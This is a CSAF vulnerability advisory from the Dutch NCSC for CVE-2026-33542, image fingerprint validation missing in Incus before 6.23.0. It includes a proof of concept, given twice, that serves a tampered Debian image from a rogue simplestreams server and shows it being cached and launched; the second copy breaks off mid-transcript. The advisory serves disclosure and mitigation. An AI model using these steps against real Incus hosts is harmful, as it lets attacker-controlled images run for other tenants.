{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information on vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33542",
        "tracking": {
            "current_release_date": "2026-04-03T12:27:48.392957Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33542",
            "initial_release_date": "2026-03-26T23:24:52.653505Z",
            "revision_history": [
                {
                    "date": "2026-03-26T23:24:52.653505Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T23:24:54.450464Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-26T23:38:45.984249Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T23:38:53.089858Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T06:43:22.399440Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1)."
                },
                {
                    "date": "2026-03-27T06:43:27.727118Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T07:35:12.521741Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T19:41:52.184212Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-27T19:41:57.168159Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T19:47:35.849901Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (7).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T19:47:46.829885Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T20:56:43.479741Z",
                    "number": "12",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-28T07:41:31.868906Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (8).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:41:33.677923Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-30T12:38:47.520947Z",
                    "number": "15",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-30T12:38:49.962187Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-30T19:24:56.656805Z",
                    "number": "17",
                    "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-30T19:25:05.012319Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T12:19:58.449802Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products connected (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-31T12:20:00.232691Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T19:06:21.496374Z",
                    "number": "21",
                    "summary": "CWES updated (1)."
                },
                {
                    "date": "2026-04-01T00:43:20.089601Z",
                    "number": "22",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Products removed (1)."
                },
                {
                    "date": "2026-04-01T00:43:29.078253Z",
                    "number": "23",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T12:21:52.251960Z",
                    "number": "24",
                    "summary": "Product Remediations created (2)."
                },
                {
                    "date": "2026-04-01T12:21:56.916641Z",
                    "number": "25",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T12:27:46.927638Z",
                    "number": "26",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "26"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5956314",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:azl3_telegraf_1.31.0-15:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "azl3 telegraf 1.31.0-15 on Azure Linux 3.0"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5956312",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:cbl2_telegraf_1.29.4-21:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "cbl2 telegraf 1.29.4-21 on CBL Mariner 2.0"
                            }
                        ],
                        "category": "product_family",
                        "name": "Open Source Software"
                    }
                ],
                "category": "vendor",
                "name": "Microsoft"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<6.23.0",
                                "product": {
                                    "name": "vers:unknown/<6.23.0",
                                    "product_id": "CSAFPID-5965579",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "incus"
                    }
                ],
                "category": "vendor",
                "name": "linuxcontainers"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<6.23.0",
                                "product": {
                                    "name": "vers:unknown/<6.23.0",
                                    "product_id": "CSAFPID-5919453"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<6.23.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<6.23.0",
                                    "product_id": "CSAFPID-5944290"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "incus"
                    }
                ],
                "category": "vendor",
                "name": "lxc"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/5.0.2-5+deb12u4",
                                        "product": {
                                            "name": "vers:deb/5.0.2-5+deb12u4",
                                            "product_id": "CSAFPID-5969890",
                                            "product_identification_helper": {
                                                "purl": "pkg:deb/debian/lxd@5.0.2-5+deb12u4?distro=bookworm"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lxd"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33542",
            "cwe": {
                "id": "CWE-295",
                "name": "Improper Certificate Validation"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33542"
                },
                {
                    "category": "description",
                    "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33542.json"
                },
                {
                    "category": "description",
                    "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33542"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Incus, a system container and virtual machine manager. A remote attacker could exploit a lack of validation of image fingerprints when downloading from simplestreams image servers. This vulnerability, under specific conditions, could lead to image cache poisoning, allowing an attacker to expose other tenants to running their controlled images instead of the expected ones.\nThis Important vulnerability in Incus, a system container and virtual machine manager, stems from insufficient image fingerprint validation during downloads from simplestreams image servers. Under specific conditions, this could lead to image cache poisoning, allowing an attacker to expose other tenants to running controlled images. This issue primarily affects community projects such as Fedora.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33542.json"
                },
                {
                    "category": "description",
                    "text": "### Summary\nA lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.\n\n### Details\nIncus image fingerprints are computed as the SHA256 of the concatenated image files.\nWhen downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.\n\nThis missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (`restricted.image.server` or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.\n\nSuch an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.\n\nFor this to be successful, the attacker requires:\n\n - Access to an Incus server\n - That server to NOT have been configured with `restricted.image.servers` or an equivalent firewall or HTTP proxy policy\n - Some ability to predict what image may be used by other users in the near future\n - Other users that are actively deploying new Incus instances on the system\n\nHaving to predict what image may be used in the future which doesn't have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. 
It's made even harder by not having any control as to when a given image may be used by another user.\n\nAn example of a somewhat easy target would be a server that's known to run ephemeral instances for Ci or build purposes, as those will get created very frequently and the images they use may be public knowledge, it would be possible to get a compromised image in place with the right timing:\n\n - Monitor the legitimate image server for a new image being published\n - Immediately create a compromised image with the same fingerprint on an attacker controlled image server\n - Get the target Incus environment to download that image BEFORE any legitimate instance creation had the time to pull the legitimate image\n\nBut this again assumes an environment lacking either `restricted.image.servers` or equivalent firewall or proxy policies.\n\n### Mitigation\nAs mentioned above, any server using `restricted.image.servers` in project configuration, as would be strongly recommended in multi-tenant environments will be immune to this attack. As would any server going through equivalent network restriction whether implemented through firewalling or through an HTTP proxy server.\n\nThe updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future.\n\n### PoC\nTo create a PoC, simply download `https://images.linuxcontainers.org/streams/v1/{index,images}.json` and `https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs}` or similar paths, put them in suitable locations in a folder, and then use a server to serve them through https. 
The TLS certificate used by the server may need to be signed by a trusted CA of the client system.\n\nThen change the content of `rootfs.squashfs` by `unsquashfs`/`mksquashfs`, add one line in `/root/.bashrc`: `echo 'PoC: hacked!'`, and then update corresponding `sha256` and `size` fields for that individual file in `images.json`.\n\nUsing `incus-simplestreams` first and then altering the `combined_xxx` fields should also be OK.\n\nAfter that, check the following commands:\n\n```\n$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams\n$ incus remote list \n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n|      NAME       |                URL                 |   PROTOCOL    |  AUTH TYPE  | PUBLIC | STATIC | GLOBAL |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| images          | https://images.linuxcontainers.org | simplestreams | none        | YES    | NO     | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| local (current) | unix://                            | incus         | file access | NO     | YES    | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| poc             | https://TESTSERVER:4443             | simplestreams | none        | YES    | NO     | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n$ incus image list \n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |\n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n$ incus image list images:debian/trixie -c 
lFpdasu\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n|              ALIAS               |                           FINGERPRINT                            | PUBLIC |              DESCRIPTION               | ARCHITECTURE |   SIZE    |     UPLOAD DATE      |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more)               | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 341.13MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more)               | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 94.70MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more)         | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 339.27MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more)         | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes    | Debian trixie arm64 
(20260320_05:24)   | aarch64      | 92.25MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/armhf (3 more)         | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes    | Debian trixie armhf (20260320_05:24)   | armv7l       | 84.14MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more)         | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 130.17MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more)         | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 374.30MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more)   | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 126.78MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more)   | 
ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 371.76MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/armhf (1 more)   | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes    | Debian trixie armhf (20260320_05:24)   | armv7l       | 117.92MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes    | Debian trixie riscv64 (20260320_05:24) | riscv64      | 122.90MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/riscv64 (3 more)       | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes    | Debian trixie riscv64 (20260320_05:24) | riscv64      | 87.86MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n$ incus image copy poc:debian/trixie local:\nImage copied successfully!                   
\n$ incus image list -c lFpdasu\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| ALIAS |                           FINGERPRINT                            | PUBLIC |             DESCRIPTION              | ARCHITECTURE |   SIZE    |     UPLOAD DATE      |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n|       | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no     | Debian trixie amd64 (20260320_05:24) | x86_64       | 105.09MiB | 2026/03/21 00:55 CST |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n$ incus launch images:debian/trixie\nLaunching the instance\nInstance name is: star-mollusk                   \n$ incus list \n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n|     NAME     |  STATE  | IPV4 |                      IPV6                      |   TYPE    | SNAPSHOTS |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| star-mollusk | RUNNING |      | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0         |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n$ incus exec star-mollusk bash\nPoC: hacked!\nroot@star-mollusk:~# \nexit\n$ incus image export images:debian/trixie\nImage exported successfully!                  \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\n945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369  -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export poc:debian/trixie\nImage exported successfully!                   
\n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002  -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nError: Image fingerprint doesn't match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\n$ incus image export poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nImage exported successfully!                   \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002  -\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-23gg-jc9r.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "### Summary\nA lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.\n\n### Details\nIncus image fingerprints are computed as the SHA256 of the concatenated image files.\nWhen downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.\n\nThis missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (`restricted.image.server` or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.\n\nSuch an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.\n\nFor this to be successful, the attacker requires:\n\n - Access to an Incus server\n - That server to NOT have been configured with `restricted.image.servers` or an equivalent firewall or HTTP proxy policy\n - Some ability to predict what image may be used by other users in the near future\n - Other users that are actively deploying new Incus instances on the system\n\nHaving to predict what image may be used in the future which doesn't have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. 
It's made even harder by not having any control as to when a given image may be used by another user.\n\nAn example of a somewhat easy target would be a server that's known to run ephemeral instances for CI or build purposes: those get created very frequently and the images they use may be public knowledge, so with the right timing it would be possible to get a compromised image in place:\n\n - Monitor the legitimate image server for a new image being published\n - Immediately publish a compromised image, listed under the same fingerprint, on an attacker-controlled image server\n - Get the target Incus environment to download that image BEFORE any legitimate instance creation has had the time to pull the legitimate image\n\nBut this again assumes an environment lacking either `restricted.image.servers` or equivalent firewall or proxy policies.\n\n### Mitigation\nAs mentioned above, any server using `restricted.image.servers` in its project configuration, as is strongly recommended in multi-tenant environments, will be immune to this attack. So will any server going through an equivalent network restriction, whether implemented through firewalling or through an HTTP proxy server.\n\nThe updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future. An already poisoned cache entry can be detected after the fact: exporting it by fingerprint from the local store (`incus image export local:<fingerprint>`) fails with a fingerprint mismatch, as shown at the end of the PoC below.\n\n### PoC\nTo create a PoC, simply download `https://images.linuxcontainers.org/streams/v1/{index,images}.json` and `https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs}` or similar paths, put them in suitable locations in a folder, and then use a server to serve them through HTTPS. 
The TLS certificate used by the server may need to be signed by a trusted CA of the client system.\n\nThen change the content of `rootfs.squashfs` by `unsquashfs`/`mksquashfs`, add one line in `/root/.bashrc`: `echo 'PoC: hacked!'`, and then update corresponding `sha256` and `size` fields for that individual file in `images.json`.\n\nUsing `incus-simplestreams` first and then altering the `combined_xxx` fields should also be OK.\n\nAfter that, check the following commands:\n\n```\n$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams\n$ incus remote list \n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n|      NAME       |                URL                 |   PROTOCOL    |  AUTH TYPE  | PUBLIC | STATIC | GLOBAL |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| images          | https://images.linuxcontainers.org | simplestreams | none        | YES    | NO     | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| local (current) | unix://                            | incus         | file access | NO     | YES    | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| poc             | https://TESTSERVER:4443             | simplestreams | none        | YES    | NO     | NO     |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n$ incus image list \n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |\n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n$ incus image list images:debian/trixie -c 
lFpdasu\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n|              ALIAS               |                           FINGERPRINT                            | PUBLIC |              DESCRIPTION               | ARCHITECTURE |   SIZE    |     UPLOAD DATE      |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more)               | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 341.13MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more)               | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 94.70MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more)         | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 339.27MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more)         | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes    | Debian trixie arm64 
(20260320_05:24)   | aarch64      | 92.25MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/armhf (3 more)         | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes    | Debian trixie armhf (20260320_05:24)   | armv7l       | 84.14MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more)         | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 130.17MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more)         | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes    | Debian trixie amd64 (20260320_05:24)   | x86_64       | 374.30MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more)   | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 126.78MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more)   | 
ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes    | Debian trixie arm64 (20260320_05:24)   | aarch64      | 371.76MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/armhf (1 more)   | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes    | Debian trixie armhf (20260320_05:24)   | armv7l       | 117.92MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes    | Debian trixie riscv64 (20260320_05:24) | riscv64      | 122.90MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/riscv64 (3 more)       | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes    | Debian trixie riscv64 (20260320_05:24) | riscv64      | 87.86MiB  | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n$ incus image copy poc:debian/trixie local:\nImage copied successfully!                   
\n$ incus image list -c lFpdasu\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| ALIAS |                           FINGERPRINT                            | PUBLIC |             DESCRIPTION              | ARCHITECTURE |   SIZE    |     UPLOAD DATE      |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n|       | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no     | Debian trixie amd64 (20260320_05:24) | x86_64       | 105.09MiB | 2026/03/21 00:55 CST |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n$ incus launch images:debian/trixie\nLaunching the instance\nInstance name is: star-mollusk                   \n$ incus list \n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n|     NAME     |  STATE  | IPV4 |                      IPV6                      |   TYPE    | SNAPSHOTS |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| star-mollusk | RUNNING |      | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0         |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n$ incus exec star-mollusk bash\nPoC: 